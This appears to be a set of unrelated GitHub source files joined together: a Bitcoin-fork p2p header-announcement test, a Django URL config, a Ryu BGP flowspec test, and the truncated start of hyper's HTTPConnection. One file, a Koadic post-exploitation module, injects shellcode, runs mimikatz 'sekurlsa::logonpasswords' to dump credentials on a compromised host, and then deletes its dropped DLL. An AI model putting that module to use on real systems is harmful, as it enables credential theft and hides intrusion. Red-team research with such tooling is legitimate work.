* peer responds with getblocks/getdata [expect: inv, blocks ]
* node mines another block [ expect: inv at tip, peer sends getdata, expect: block ]
* node mines another block at tip [ expect: inv ]
* peer responds with getheaders with an old hashstop more than 8 blocks back [expect: headers]
* peer requests block [ expect: block ]
* node mines another block at tip [ expect: inv, peer sends getdata, expect: block ]
* peer sends response-type [expect headers if getheaders, getheaders/getdata if mining new block]
* node mines 1 block [expect: 1 header, peer responds with getdata]
Part 4: Test direct fetch behavior
a. Announce 2 old block headers.
Expect: no getdata requests.
b. Announce 3 new blocks via 1 headers message.
Expect: one getdata request for all 3 blocks.
(Send blocks.)
c. Announce 1 header that forks off the last two blocks.
Expect: no response.
d. Announce 1 more header that builds on that fork.
Expect: one getdata request for two blocks.
e. Announce 16 more headers that build on that fork.
Expect: getdata request for 14 more blocks.
f. Announce 1 more header that builds on that fork.
Expect: no response.
'''
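# Illustrative helper (not called anywhere in this test): how the two
# announcement styles described in the docstring above map onto mininode
# messages. `block` is assumed to be a solved block from create_block().
def _example_block_announcements(block):
    # inv-style announcement: a single inventory entry of type 2 (block)
    inv = msg_inv()
    inv.inv = [CInv(2, block.sha256)]
    # headers-style announcement: the full header wrapped in a headers message;
    # a peer opts into receiving these by sending msg_sendheaders() once
    hdrs = msg_headers()
    hdrs.headers = [CBlockHeader(block)]
    return inv, hdrs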
class BaseNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.last_inv = None
self.last_headers = None
self.last_block = None
self.ping_counter = 1
self.last_pong = msg_pong(0)
self.last_getdata = None
self.sleep_time = 0.05
self.block_announced = False
def clear_last_announcement(self):
with mininode_lock:
self.block_announced = False
self.last_inv = None
self.last_headers = None
def add_connection(self, conn):
self.connection = conn
# Request data for a list of block hashes
def get_data(self, block_hashes):
msg = msg_getdata()
for x in block_hashes:
msg.inv.append(CInv(2, x))
self.connection.send_message(msg)
def get_headers(self, locator, hashstop):
msg = msg_getheaders()
msg.locator.vHave = locator
msg.hashstop = hashstop
self.connection.send_message(msg)
def send_block_inv(self, blockhash):
msg = msg_inv()
msg.inv = [CInv(2, blockhash)]
self.connection.send_message(msg)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_inv(self, conn, message):
self.last_inv = message
self.block_announced = True
def on_headers(self, conn, message):
self.last_headers = message
self.block_announced = True
def on_block(self, conn, message):
self.last_block = message.block
self.last_block.calc_sha256()
def on_getdata(self, conn, message):
self.last_getdata = message
def on_pong(self, conn, message):
self.last_pong = message
# Test whether the last announcement we received had the
# right header or the right inv
# inv and headers should be lists of block hashes
def check_last_announcement(self, headers=None, inv=None):
expect_headers = headers if headers != None else []
expect_inv = inv if inv != None else []
test_function = lambda: self.block_announced
self.sync(test_function)
with mininode_lock:
self.block_announced = False
success = True
compare_inv = []
if self.last_inv != None:
compare_inv = [x.hash for x in self.last_inv.inv]
if compare_inv != expect_inv:
success = False
hash_headers = []
if self.last_headers != None:
# treat headers as a list of block hashes
hash_headers = [ x.sha256 for x in self.last_headers.headers ]
if hash_headers != expect_headers:
success = False
self.last_inv = None
self.last_headers = None
return success
# Syncing helpers
def sync(self, test_function, timeout=60):
while timeout > 0:
with mininode_lock:
if test_function():
return
time.sleep(self.sleep_time)
timeout -= self.sleep_time
raise AssertionError("Sync failed to complete")
def sync_with_ping(self, timeout=60):
self.send_message(msg_ping(nonce=self.ping_counter))
test_function = lambda: self.last_pong.nonce == self.ping_counter
self.sync(test_function, timeout)
self.ping_counter += 1
return
def wait_for_block(self, blockhash, timeout=60):
test_function = lambda: self.last_block != None and self.last_block.sha256 == blockhash
self.sync(test_function, timeout)
return
def wait_for_getdata(self, hash_list, timeout=60):
if hash_list == []:
return
test_function = lambda: self.last_getdata != None and [x.hash for x in self.last_getdata.inv] == hash_list
self.sync(test_function, timeout)
return
def send_header_for_blocks(self, new_blocks):
headers_message = msg_headers()
headers_message.headers = [ CBlockHeader(b) for b in new_blocks ]
self.send_message(headers_message)
def send_getblocks(self, locator):
getblocks_message = msg_getblocks()
getblocks_message.locator.vHave = locator
self.send_message(getblocks_message)
# InvNode: This peer should only ever receive inv's, because it doesn't ever send a
# "sendheaders" message.
class InvNode(BaseNode):
def __init__(self):
BaseNode.__init__(self)
# TestNode: This peer is the one we use for most of the testing.
class TestNode(BaseNode):
def __init__(self):
BaseNode.__init__(self)
class SendHeadersTest(FlurboTestFramework):
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
self.nodes = []
self.nodes = start_nodes(2, self.options.tmpdir, [["-debug", "-logtimemicros=1"]]*2)
connect_nodes(self.nodes[0], 1)
# mine count blocks and return the new tip
def mine_blocks(self, count):
# Clear out last block announcement from each p2p listener
[ x.clear_last_announcement() for x in self.p2p_connections ]
self.nodes[0].generate(count)
return int(self.nodes[0].getbestblockhash(), 16)
# mine a reorg that invalidates length blocks (replacing them with
# length+1 blocks).
# Note: we clear the state of our p2p connections after the
# to-be-reorged-out blocks are mined, so that we don't break later tests.
# return the list of block hashes newly mined
def mine_reorg(self, length):
self.nodes[0].generate(length) # make sure all invalidated blocks are node0's
sync_blocks(self.nodes, wait=0.1)
[x.clear_last_announcement() for x in self.p2p_connections]
tip_height = self.nodes[1].getblockcount()
hash_to_invalidate = self.nodes[1].getblockhash(tip_height-(length-1))
self.nodes[1].invalidateblock(hash_to_invalidate)
all_hashes = self.nodes[1].generate(length+1) # Must be longer than the orig chain
sync_blocks(self.nodes, wait=0.1)
return [int(x, 16) for x in all_hashes]
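    # Worked example of the helper above (illustrative numbers): mine_reorg(7)
    # has node0 mine 7 blocks, then node1 invalidates those 7 and mines 8
    # replacements, so the reorged-in chain is one block longer than the chain
    # it displaces and both nodes sync to it before the hashes are returned.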
def run_test(self):
# Setup the p2p connections and start up the network thread.
inv_node = InvNode()
test_node = TestNode()
self.p2p_connections = [inv_node, test_node]
connections = []
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], inv_node))
# Set nServices to 0 for test_node, so no block download will occur outside of
# direct fetching
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_node, services=0))
inv_node.add_connection(connections[0])
test_node.add_connection(connections[1])
NetworkThread().start() # Start up network handling in another thread
# Test logic begins here
inv_node.wait_for_verack()
test_node.wait_for_verack()
tip = int(self.nodes[0].getbestblockhash(), 16)
# PART 1
# 1. Mine a block; expect inv announcements each time
print("Part 1: headers don't start before sendheaders message...")
for i in range(4):
old_tip = tip
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
# Try a few different responses; none should affect next announcement
if i == 0:
# first request the block
test_node.get_data([tip])
test_node.wait_for_block(tip, timeout=5)
elif i == 1:
# next try requesting header and block
test_node.get_headers(locator=[old_tip], hashstop=tip)
test_node.get_data([tip])
test_node.wait_for_block(tip)
test_node.clear_last_announcement() # since we requested headers...
elif i == 2:
# this time announce own block via headers
height = self.nodes[0].getblockcount()
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
new_block = create_block(tip, create_coinbase(height+1), block_time)
new_block.solve()
test_node.send_header_for_blocks([new_block])
test_node.wait_for_getdata([new_block.sha256], timeout=5)
test_node.send_message(msg_block(new_block))
test_node.sync_with_ping() # make sure this block is processed
inv_node.clear_last_announcement()
test_node.clear_last_announcement()
print("Part 1: success!")
print("Part 2: announce blocks with headers after sendheaders message...")
# PART 2
# 2. Send a sendheaders message and test that headers announcements
# commence and keep working.
test_node.send_message(msg_sendheaders())
prev_tip = int(self.nodes[0].getbestblockhash(), 16)
test_node.get_headers(locator=[prev_tip], hashstop=0)
test_node.sync_with_ping()
# Now that we've synced headers, headers announcements should work
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
height = self.nodes[0].getblockcount()+1
block_time += 10 # Advance far enough ahead
for i in range(10):
# Mine i blocks, and alternate announcing either via
# inv (of tip) or via headers. After each, new blocks
# mined by the node should successfully be announced
# with block header, even though the blocks are never requested
for j in range(2):
blocks = []
for b in range(i+1):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
if j == 0:
# Announce via inv
test_node.send_block_inv(tip)
test_node.wait_for_getdata([tip], timeout=5)
# Test that duplicate inv's won't result in duplicate
# getdata requests, or duplicate headers announcements
inv_node.send_block_inv(tip)
# Should have received a getheaders as well!
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks[0:-1]], timeout=5)
[ inv_node.send_block_inv(x.sha256) for x in blocks[0:-1] ]
inv_node.sync_with_ping()
else:
# Announce via headers
test_node.send_header_for_blocks(blocks)
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=5)
# Test that duplicate headers won't result in duplicate
# getdata requests (the check is further down)
inv_node.send_header_for_blocks(blocks)
inv_node.sync_with_ping()
[ test_node.send_message(msg_block(x)) for x in blocks ]
test_node.sync_with_ping()
inv_node.sync_with_ping()
# This block should not be announced to the inv node (since it also
# broadcast it)
assert_equal(inv_node.last_inv, None)
assert_equal(inv_node.last_headers, None)
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
height += 1
block_time += 1
print("Part 2: success!")
print("Part 3: headers announcements can stop after large reorg, and resume after headers/inv from peer...")
# PART 3. Headers announcements can stop after large reorg, and resume after
# getheaders or inv from peer.
for j in range(2):
# First try mining a reorg that can propagate with header announcement
new_block_hashes = self.mine_reorg(length=7)
tip = new_block_hashes[-1]
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=new_block_hashes), True)
block_time += 8
# Mine a too-large reorg, which should be announced with a single inv
new_block_hashes = self.mine_reorg(length=8)
tip = new_block_hashes[-1]
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
block_time += 9
fork_point = self.nodes[0].getblock("%02x" % new_block_hashes[0])["previousblockhash"]
fork_point = int(fork_point, 16)
# Use getblocks/getdata
test_node.send_getblocks(locator = [fork_point])
assert_equal(test_node.check_last_announcement(inv=new_block_hashes), True)
test_node.get_data(new_block_hashes)
test_node.wait_for_block(new_block_hashes[-1])
for i in range(3):
# Mine another block, still should get only an inv
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(inv=[tip]), True)
if i == 0:
# Just get the data -- shouldn't cause headers announcements to resume
test_node.get_data([tip])
test_node.wait_for_block(tip)
elif i == 1:
# Send a getheaders message that shouldn't trigger headers announcements
# to resume (best header sent will be too old)
test_node.get_headers(locator=[fork_point], hashstop=new_block_hashes[1])
test_node.get_data([tip])
test_node.wait_for_block(tip)
elif i == 2:
test_node.get_data([tip])
test_node.wait_for_block(tip)
# This time, try sending either a getheaders to trigger resumption
# of headers announcements, or mine a new block and inv it, also
# triggering resumption of headers announcements.
if j == 0:
test_node.get_headers(locator=[tip], hashstop=0)
test_node.sync_with_ping()
else:
test_node.send_block_inv(tip)
test_node.sync_with_ping()
# New blocks should now be announced with header
tip = self.mine_blocks(1)
assert_equal(inv_node.check_last_announcement(inv=[tip]), True)
assert_equal(test_node.check_last_announcement(headers=[tip]), True)
print("Part 3: success!")
print("Part 4: Testing direct fetch behavior...")
tip = self.mine_blocks(1)
height = self.nodes[0].getblockcount() + 1
last_time = self.nodes[0].getblock(self.nodes[0].getbestblockhash())['time']
block_time = last_time + 1
# Create 2 blocks. Send the blocks, then send the headers.
blocks = []
for b in range(2):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
inv_node.send_message(msg_block(blocks[-1]))
inv_node.sync_with_ping() # Make sure blocks are processed
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
# should not have received any getdata messages
with mininode_lock:
assert_equal(test_node.last_getdata, None)
# This time, direct fetch should work
blocks = []
for b in range(3):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
test_node.send_header_for_blocks(blocks)
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks], timeout=test_node.sleep_time)
[ test_node.send_message(msg_block(x)) for x in blocks ]
test_node.sync_with_ping()
# Now announce a header that forks the last two blocks
tip = blocks[0].sha256
height -= 1
blocks = []
# Create extra blocks for later
for b in range(20):
blocks.append(create_block(tip, create_coinbase(height), block_time))
blocks[-1].solve()
tip = blocks[-1].sha256
block_time += 1
height += 1
# Announcing one block on fork should not trigger direct fetch
# (less work than tip)
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks[0:1])
test_node.sync_with_ping()
with mininode_lock:
assert_equal(test_node.last_getdata, None)
# Announcing one more block on fork should trigger direct fetch for
# both blocks (same work as tip)
test_node.send_header_for_blocks(blocks[1:2])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[0:2]], timeout=test_node.sleep_time)
# Announcing 16 more headers should trigger direct fetch for 14 more
# blocks
test_node.send_header_for_blocks(blocks[2:18])
test_node.sync_with_ping()
test_node.wait_for_getdata([x.sha256 for x in blocks[2:16]], timeout=test_node.sleep_time)
# Announcing 1 more header should not trigger any response
test_node.last_getdata = None
test_node.send_header_for_blocks(blocks[18:19])
test_node.sync_with_ping()
with mininode_lock:
assert_equal(test_node.last_getdata, None)
print("Part 4: success!")
# Finally, check that the inv node never received a getdata request,
# throughout the test
assert_equal(inv_node.last_getdata, None)
if __name__ == '__main__':
SendHeadersTest().main()
| {
"content_hash": "cd5ff3091b48b9ff8940468cffd30269",
"timestamp": "",
"source": "github",
"line_count": 511,
"max_line_length": 116,
"avg_line_length": 42.336594911937375,
"alnum_prop": 0.6041878524544698,
"repo_name": "Flurbos/Flurbo",
"id": "8943021d524cf87ef05a162c69671c54a0dc0716",
"size": "21848",
"binary": false,
"copies": "1",
"ref": "refs/heads/0.12.2",
"path": "qa/rpc-tests/sendheaders.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "644262"
},
{
"name": "C++",
"bytes": "4192638"
},
{
"name": "CSS",
"bytes": "1127"
},
{
"name": "HTML",
"bytes": "50621"
},
{
"name": "Java",
"bytes": "2099"
},
{
"name": "M4",
"bytes": "145618"
},
{
"name": "Makefile",
"bytes": "95713"
},
{
"name": "Objective-C",
"bytes": "3686"
},
{
"name": "Objective-C++",
"bytes": "7238"
},
{
"name": "Python",
"bytes": "681152"
},
{
"name": "QMake",
"bytes": "2019"
},
{
"name": "Roff",
"bytes": "3753"
},
{
"name": "Shell",
"bytes": "35693"
}
],
"symlink_target": ""
} |
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'remembermyseries.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^tvapp/', include('tvapp.urls')),
url(r'^admin/', include(admin.site.urls)),
)
| {
"content_hash": "e14e12f900b04b4bfe1050339480dff5",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 61,
"avg_line_length": 32.8,
"alnum_prop": 0.6432926829268293,
"repo_name": "niksolaz/TvApp",
"id": "85ef4a1674a7811e944080ae8c6573aa403d343d",
"size": "328",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "remembermyseries/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10147"
}
],
"symlink_target": ""
} |
import core.implant
import core.job
import core.cred_parser
import string
import collections
import time
import uuid
class DynWrapXShellcodeJob(core.job.Job):
def create(self):
self.fork32Bit = True
        self.errstat = 0
        self.mimi_output = ""  # ensure the attribute exists even if no mimikatz output is ever parsed
self.options.set("DLLUUID", uuid.uuid4().hex)
self.options.set("MANIFESTUUID", uuid.uuid4().hex)
self.options.set("SHIMX64UUID", uuid.uuid4().hex)
self.options.set("MIMIX64UUID", uuid.uuid4().hex)
self.options.set("MIMIX86UUID", uuid.uuid4().hex)
self.options.set("MIMICMD", self.options.get("MIMICMD").lower())
self.options.set("SHIMX86BYTES", self.make_arrDLL(self.options.get("SHIMX86DLL")))
self.options.set("DIRECTORY", self.options.get('DIRECTORY').replace("\\", "\\\\").replace('"', '\\"'))
def parse_mimikatz(self, data):
cp = core.cred_parser.CredParse(self)
self.mimi_output = cp.parse_mimikatz(data)
def report(self, handler, data, sanitize = False):
data = data.decode('latin-1')
import binascii
try:
data = binascii.unhexlify(data)
data = data.decode('utf-16-le')
except:
pass
#print(data)
task = handler.get_header(self.options.get("UUIDHEADER"), False)
if task == self.options.get("DLLUUID"):
handler.send_file(self.options.get("DYNWRAPXDLL"))
return
if task == self.options.get("MANIFESTUUID"):
handler.send_file(self.options.get("DYNWRAPXMANIFEST"))
return
if task == self.options.get("SHIMX64UUID"):
handler.send_file(self.options.get("SHIMX64DLL"))
if task == self.options.get("MIMIX64UUID"):
handler.send_file(self.options.get("MIMIX64DLL"))
if task == self.options.get("MIMIX86UUID"):
handler.send_file(self.options.get("MIMIX86DLL"))
if len(data) == 0:
handler.reply(200)
return
if "mimikatz(powershell) # " in data:
self.parse_mimikatz(data)
handler.reply(200)
return
if data == "Complete" and self.errstat != 1:
super(DynWrapXShellcodeJob, self).report(handler, data)
handler.reply(200)
def make_arrDLL(self, path):
import struct
count = 0
ret = ""
with open(path, 'rb') as fileobj:
for chunk in iter(lambda: fileobj.read(4), ''):
if len(chunk) != 4:
break
integer_value = struct.unpack('<I', chunk)[0]
ret += hex(integer_value).rstrip("L") + ","
if count % 20 == 0:
ret += "\r\n"
count += 1
return ret[:-1]
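    # Hedged illustration of make_arrDLL's output (bytes are made up, not from a
    # real DLL): the input 01 00 00 00 02 00 00 00 unpacks to the little-endian
    # DWORDs 1 and 2, so the method returns "0x1,\r\n0x2" -- a comma-separated
    # hex list with a CRLF after every 20th value (starting from the first),
    # presumably substituted into the JScript stager as an array literal.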
def done(self):
self.results = self.mimi_output if self.mimi_output else ""
self.display()
# deleting dynwrapx.dll, i hate this
time.sleep(1)
plugin = self.shell.plugins['implant/manage/exec_cmd']
old_zombie = plugin.options.get("ZOMBIE")
old_cmd = plugin.options.get("CMD")
old_output = plugin.options.get("OUTPUT")
plugin.options.set("ZOMBIE", self.options.get("ZOMBIE"))
plugin.options.set("CMD", "del /f "+self.options.get("DIRECTORY")+"\\dynwrapx.dll & echo done")
plugin.options.set("OUTPUT", "true")
plugin.run()
plugin.options.set("ZOMBIE", old_zombie)
plugin.options.set("CMD", old_cmd)
plugin.options.set("OUTPUT", old_output)
def display(self):
try:
self.print_good(self.mimi_output)
except:
pass
class DynWrapXShellcodeImplant(core.implant.Implant):
NAME = "Shellcode via Dynamic Wrapper X"
DESCRIPTION = "Executes arbitrary shellcode using the Dynamic Wrapper X COM object"
AUTHORS = ["zerosum0x0", "Aleph-Naught-" "gentilwiki"]
STATE = "implant/inject/mimikatz_dynwrapx"
def load(self):
self.options.register("DIRECTORY", "%TEMP%", "writeable directory on zombie", required=False)
self.options.register("MIMICMD", "sekurlsa::logonpasswords", "What Mimikatz command to run?", required=True)
self.options.register("SHIMX86DLL", "data/bin/mimishim.dll", "relative path to mimishim.dll", required=True, advanced=True)
self.options.register("SHIMX64DLL", "data/bin/mimishim.x64.dll", "relative path to mimishim.x64.dll", required=True, advanced=True)
self.options.register("MIMIX86DLL", "data/bin/powerkatz32.dll", "relative path to powerkatz32.dll", required=True, advanced=True)
self.options.register("MIMIX64DLL", "data/bin/powerkatz64.dll", "relative path to powerkatz64.dll", required=True, advanced=True)
self.options.register("DYNWRAPXDLL", "data/bin/dynwrapx.dll", "relative path to dynwrapx.dll", required=True, advanced=True)
self.options.register("DYNWRAPXMANIFEST", "data/bin/dynwrapx.manifest", "relative path to dynwrapx.manifest", required=True, advanced=True)
self.options.register("UUIDHEADER", "ETag", "HTTP header for UUID", advanced=True)
self.options.register("DLLUUID", "", "HTTP header for UUID", hidden=True)
self.options.register("MANIFESTUUID", "", "UUID", hidden=True)
self.options.register("SHIMX64UUID", "", "UUID", hidden=True)
self.options.register("MIMIX64UUID", "", "UUID", hidden=True)
self.options.register("MIMIX86UUID", "", "UUID", hidden=True)
self.options.register("SHIMX86BYTES", "", "calculated bytes for arr_DLL", hidden=True)
self.options.register("SHIMX86OFFSET", "6202", "Offset to the reflective loader", advanced = True)
def job(self):
return DynWrapXShellcodeJob
def make_arrDLL(self, path):
import struct
count = 0
ret = ""
with open(path, 'rb') as fileobj:
for chunk in iter(lambda: fileobj.read(4), ''):
if len(chunk) != 4:
break
integer_value = struct.unpack('<I', chunk)[0]
ret += hex(integer_value).rstrip("L") + ","
if count % 20 == 0:
ret += "\r\n"
count += 1
return ret[:-1] # strip last comma
def run(self):
workloads = {}
workloads["js"] = "data/implant/inject/mimikatz_dynwrapx.js"
self.dispatch(workloads, self.job)
| {
"content_hash": "56fd98ea804e78bfe47961c180ed9af5",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 147,
"avg_line_length": 38.99390243902439,
"alnum_prop": 0.6014073494917904,
"repo_name": "zerosum0x0/koadic",
"id": "d8af460ebd929f61d0f3bbd21b63a278b8f4a722",
"size": "6395",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "modules/implant/inject/mimikatz_dynwrapx.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1153"
},
{
"name": "C",
"bytes": "152727"
},
{
"name": "C#",
"bytes": "4074"
},
{
"name": "C++",
"bytes": "17602"
},
{
"name": "Dockerfile",
"bytes": "192"
},
{
"name": "JavaScript",
"bytes": "99522"
},
{
"name": "Python",
"bytes": "2958758"
},
{
"name": "VBA",
"bytes": "1700"
},
{
"name": "VBScript",
"bytes": "14154"
},
{
"name": "XSLT",
"bytes": "295"
}
],
"symlink_target": ""
} |
import logging
import unittest
from nose.tools import eq_, raises
from ryu.lib.packet.bgp import (
BGPFlowSpecTrafficRateCommunity,
BGPFlowSpecTrafficActionCommunity,
BGPFlowSpecRedirectCommunity,
BGPFlowSpecTrafficMarkingCommunity,
BGPFlowSpecVlanActionCommunity,
BGPFlowSpecTPIDActionCommunity,
)
from ryu.services.protocols.bgp.core import BgpCoreError
from ryu.services.protocols.bgp.utils.bgp import create_v4flowspec_actions
from ryu.services.protocols.bgp.utils.bgp import create_v6flowspec_actions
from ryu.services.protocols.bgp.utils.bgp import create_l2vpnflowspec_actions
LOG = logging.getLogger(__name__)
class Test_Utils_BGP(unittest.TestCase):
"""
Test case for ryu.services.protocols.bgp.utils.bgp
"""
def _test_create_v4flowspec_actions(self, actions, expected_communities):
communities = create_v4flowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_v4flowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
]
self._test_create_v4flowspec_actions(actions, expected_communities)
def test_create_v4flowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_v4flowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_v4flowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_v4flowspec_actions(actions, expected_communities)
def _test_create_v6flowspec_actions(self, actions, expected_communities):
communities = create_v6flowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_v6flowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
]
self._test_create_v6flowspec_actions(actions, expected_communities)
def test_create_v6flowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_v6flowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_v6flowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_v6flowspec_actions(actions, expected_communities)
def _test_create_l2vpnflowspec_actions(self, actions, expected_communities):
communities = create_l2vpnflowspec_actions(actions)
expected_communities.sort(key=lambda x: x.subtype)
communities.sort(key=lambda x: x.subtype)
eq_(str(expected_communities), str(communities))
def test_create_l2vpnflowspec_actions_all_actions(self):
actions = {
'traffic_rate': {
'as_number': 0,
'rate_info': 100.0,
},
'traffic_action': {
'action': 3,
},
'redirect': {
'as_number': 10,
'local_administrator': 10,
},
'traffic_marking': {
'dscp': 24,
},
'vlan_action': {
'actions_1': (BGPFlowSpecVlanActionCommunity.POP |
BGPFlowSpecVlanActionCommunity.SWAP),
'vlan_1': 3000,
'cos_1': 3,
'actions_2': BGPFlowSpecVlanActionCommunity.PUSH,
'vlan_2': 4000,
'cos_2': 2,
},
'tpid_action': {
'actions': (BGPFlowSpecTPIDActionCommunity.TI |
BGPFlowSpecTPIDActionCommunity.TO),
'tpid_1': 5,
'tpid_2': 6,
}
}
expected_communities = [
BGPFlowSpecTrafficRateCommunity(as_number=0, rate_info=100.0),
BGPFlowSpecTrafficActionCommunity(action=3),
BGPFlowSpecRedirectCommunity(as_number=10, local_administrator=10),
BGPFlowSpecTrafficMarkingCommunity(dscp=24),
BGPFlowSpecVlanActionCommunity(
actions_1=(BGPFlowSpecVlanActionCommunity.POP |
BGPFlowSpecVlanActionCommunity.SWAP),
vlan_1=3000,
cos_1=3,
actions_2=BGPFlowSpecVlanActionCommunity.PUSH,
vlan_2=4000,
cos_2=2,
),
BGPFlowSpecTPIDActionCommunity(
actions=(BGPFlowSpecTPIDActionCommunity.TI |
BGPFlowSpecTPIDActionCommunity.TO),
tpid_1=5,
tpid_2=6,
),
]
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
def test_create_l2vpnflowspec_actions_without_actions(self):
actions = None
expected_communities = []
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
@raises(ValueError)
def test_create_l2vpnflowspec_actions_not_exist_actions(self):
actions = {
'traffic_test': {
'test': 10,
},
}
expected_communities = []
self._test_create_l2vpnflowspec_actions(actions, expected_communities)
| {
"content_hash": "39f23d0a7335a957e9d149a85468273b",
"timestamp": "",
"source": "github",
"line_count": 195,
"max_line_length": 80,
"avg_line_length": 35.62051282051282,
"alnum_prop": 0.5739994241289951,
"repo_name": "fujita/ryu",
"id": "6933a28b322b9637308498993e887b9c2ba75940",
"size": "7560",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "ryu/tests/unit/services/protocols/bgp/utils/test_bgp.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "28540"
},
{
"name": "CSS",
"bytes": "306"
},
{
"name": "Erlang",
"bytes": "874721"
},
{
"name": "Gnuplot",
"bytes": "1094"
},
{
"name": "HTML",
"bytes": "306"
},
{
"name": "JavaScript",
"bytes": "8436"
},
{
"name": "Makefile",
"bytes": "88"
},
{
"name": "Python",
"bytes": "6135247"
},
{
"name": "Shell",
"bytes": "17573"
}
],
"symlink_target": ""
} |
"""
hyper/common/connection
~~~~~~~~~~~~~~~~~~~~~~~
Hyper's HTTP/1.1 and HTTP/2 abstraction layer.
"""
from .exceptions import TLSUpgrade, HTTPUpgrade
from ..http11.connection import HTTP11Connection
from ..http20.connection import HTTP20Connection
from ..tls import H2_NPN_PROTOCOLS, H2C_PROTOCOL
class HTTPConnection(object):
"""
An object representing a single HTTP connection to a server.
This object behaves similarly to the Python standard library's
``HTTPConnection`` object, with a few critical differences.
Most of the standard library's arguments to the constructor are not
supported by hyper. Most optional parameters apply to *either* HTTP/1.1 or
HTTP/2.
:param host: The host to connect to. This may be an IP address or a
hostname, and optionally may include a port: for example,
``'http2bin.org'``, ``'http2bin.org:443'`` or ``'127.0.0.1'``.
:param port: (optional) The port to connect to. If not provided and one also
isn't provided in the ``host`` parameter, defaults to 443.
:param secure: (optional) Whether the request should use TLS.
Defaults to ``False`` for most requests, but to ``True`` for any
request issued to port 443.
:param window_manager: (optional) The class to use to manage flow control
windows. This needs to be a subclass of the
:class:`BaseFlowControlManager <hyper.http20.window.BaseFlowControlManager>`.
If not provided,
:class:`FlowControlManager <hyper.http20.window.FlowControlManager>`
will be used.
:param enable_push: (optional) Whether the server is allowed to push
resources to the client (see
:meth:`get_pushes() <hyper.HTTP20Connection.get_pushes>`).
:param ssl_context: (optional) A class with custom certificate settings.
If not provided then hyper's default ``SSLContext`` is used instead.
:param proxy_host: (optional) The proxy to connect to. This can be an IP address
or a host name and may include a port.
:param proxy_port: (optional) The proxy port to connect to. If not provided
and one also isn't provided in the ``proxy`` parameter, defaults to 8080.
"""
def __init__(self,
host,
port=None,
secure=None,
window_manager=None,
enable_push=False,
ssl_context=None,
proxy_host=None,
proxy_port=None,
